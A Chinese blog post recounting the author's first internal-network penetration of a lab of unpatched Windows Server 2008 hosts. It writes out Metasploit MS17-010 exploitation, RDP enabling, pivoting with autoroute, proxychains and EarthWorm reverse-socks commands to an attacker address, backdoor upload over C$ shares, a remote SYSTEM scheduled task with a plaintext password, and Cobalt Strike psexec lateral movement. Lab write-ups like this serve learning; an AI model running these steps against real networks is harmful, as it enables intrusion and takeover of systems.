美文网首页
我的第一次内网渗透

我的第一次内网渗透

作者: 白面安全猿 | 来源:发表于2021-11-28 15:39 被阅读0次

我的第一次内网渗透

网络拓扑

因为是一次简单的内网渗透,以上靶机均为Windows Server2008,并且没有装任何的补丁,所以全都可以使用ms17_010(永恒之蓝)进行攻击

首先直接使用msf拿到了内网跳板(10.7.233.212)的shell,并且为最高权限,

然后对它进行信息收集,首先查看IP,查看内网的网段是多少 输入命令ipconfig进行查看,然后得知内网跳板的内网IP为(192.168.174.128),

然后为了方便操作,直接在meterpreter界面中输入命令run getgui -e一键开启靶机的3389端口

,然后再输入arp -g和route print对靶机进行信息收集,得到了靶机内网的另一台机子的IP地址为(192.168.174.129) 连接(192.168.174.128:3389);

CS生成了一个后缀为exe的后门,想用python -m http.server将后门通过浏览器的方式传输到靶机中,但是发现靶机并不能访问到web服务器.只能通过msf创建的shell来上传.

将后门成功上传到靶机中,运行,CS上线了靶机

然后进行对内网中的靶机进行渗透测试;首先想要想要进一步对内网进行渗透,那么就要配置代理服务,使得kali能够成功进入内网;

首先想到先用的代理方式是msf本身的代理方式,通过在跳板机中加入一条路由,然后切换到auxiliary/server/socks_proxy模块开启代理服务;

首先进入msf中内网跳板机(10.7.233.212&192.168.174.128)的meterpreter界面输入命令run post/multi/manage/autoroute自动添加一条路由,然后将会话放入后台

,开启socks的代理服务(配置SRVHOST,SRVPORT,VERSION),然后配置/etc/proxychains4.conf文件,在文件的最后一行添加->sock5 127.0.0.1 1234,

然后调用proxychains来执行命令,但是一开始一直是用proxychains ping去测试代理是否成功,但是后来才发现,ping命令根本就不能够使用

sock4a:TELNET,FTP,HTTP等TCP协议;

sock5:TCP与UDP,并支持安全认证方案;

这两种协议均不支持ping,因为ping是icmp; 因为一开始没发现,以为是代理没有成功,后面就换了ew来进行内网渗透,将Windows版本的ew上传至靶机,

切换到本机(攻击机->kali)输出命令ew -s rcsocks -l 1080 -e 8888将本地1080端口受到的代理转发至8888端口,然后切换到靶机上输入命令ew -s rssocks -d 10.7.33.234 -e 8888,

当本机ew界面弹出

回显即为代理成功,因为可以使用ms17_010一路通关,就直接用代理开启msf然后继续对129进行渗透测试

使用命令proxychains msfconsole开启msf,是使用了sock5代理的,当然也可以在cs中直接设置代理,然后在msf中直接设置全局变量使用代理,

然后继续进行下一步的渗透测试,继续使用ms17_010模块,去对下一台靶机进行渗透测试,但是发现怎么样都没有将shell弹出来,以为是msf中shell传不出来,于是改用CS,生成后门,然后上传另一台靶机,

使用计划执行的命令来触发木马,先将生成好的木马上传至已经获得shell的跳板机,然后使用命令

copy C:\shell.exe \192.16.174.129\C$将名为shell.exe的后门上传至内网跳板二上,然后再使用命令

schtasks /create /s 192.168.174.129 /u Administrator /p P@ssw0rd! /ru “SYSTEM” /tn test /sc DALIY /st 14:10 /tr C:\windows\temp\shell.exe创建一个名为test的计划任务,在每天的14:10执行shell.exe文件,但是CS并没有相应机器上线 后来才察觉到,这个是不出网机器的渗透;于是改变策略,在CS上创建一个监听器,使用的payload是Beacon SMB,然后再CS中使用psexec进行横向移动,选择刚才创建的payload为Beacon SMB的监听器,选择10.7.233.212的会话,然后开始横向移动,然后就会得到一个IP地址为192.168.174.128的会话->

然后用这个会话生成一个监听器,选中中转模块的listenr,生成一个监听器,然后用监听器生成一个后门上传并允许就有一个新的会话。

相关文章

  • 我的第一次内网渗透

    我的第一次内网渗透 网络拓扑 因为是一次简单的内网渗透,以上靶机均为Windows Server2008,并且没有...

  • 内网渗透

    内网渗透

  • 当我讲起内网渗透,他们都弃我而去了

    前言在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 环境搭建...

  • 网络嗅探

    1、 (1)Why要内网渗透:安全机制严,正面突破难;内网间信任,攻击更容易。 (2)内网渗透技术:嗅探、假消息攻...

  • 实战——红日ATT&CK系列靶场(一)

    前言: 在最近一年的工作中,很少能接触到内网渗透的工作,为了进一步锻炼内网渗透的能力,理清内网渗透中的思路及攻击手...

  • 基于MetaSploit内网穿透渗透测试

    自己在无聊捣鼓windows渗透的时候想到以往都是基于内网渗透,想要更加自由地进行渗透就需要内网穿透实现可以任意控...

  • 我是如何逃过所有杀软进行内网端口转发

    平时在渗透测试中大家经常会用到内网渗透,然而内网渗透中很重要的一个步骤就是端口转发。 常见的端口转发 lcx.ex...

  • 每日安全资讯(2020-07-27)

    内网信息收集与上传下载可以说内网渗透测试,其本质就是信息收集。信息收集的深度,直接关系到内网渗透测试的成败。当你拿...

  • 【内网渗透】记录一次内网渗透

    在公司进行渗透测试项目,网站是asp的网站,有个上传点,但是上传的后缀名只能是jpg,gif,png,通过00截断...

  • 内网渗透_域渗透2

    先放地址:https://bithack.io/forum/267 自从第一眼看到这篇文章之后就顺手将环境保存了网...

网友评论

      本文标题:我的第一次内网渗透

      本文链接:https://www.haomeiwen.com/subject/xdxhxrtx.html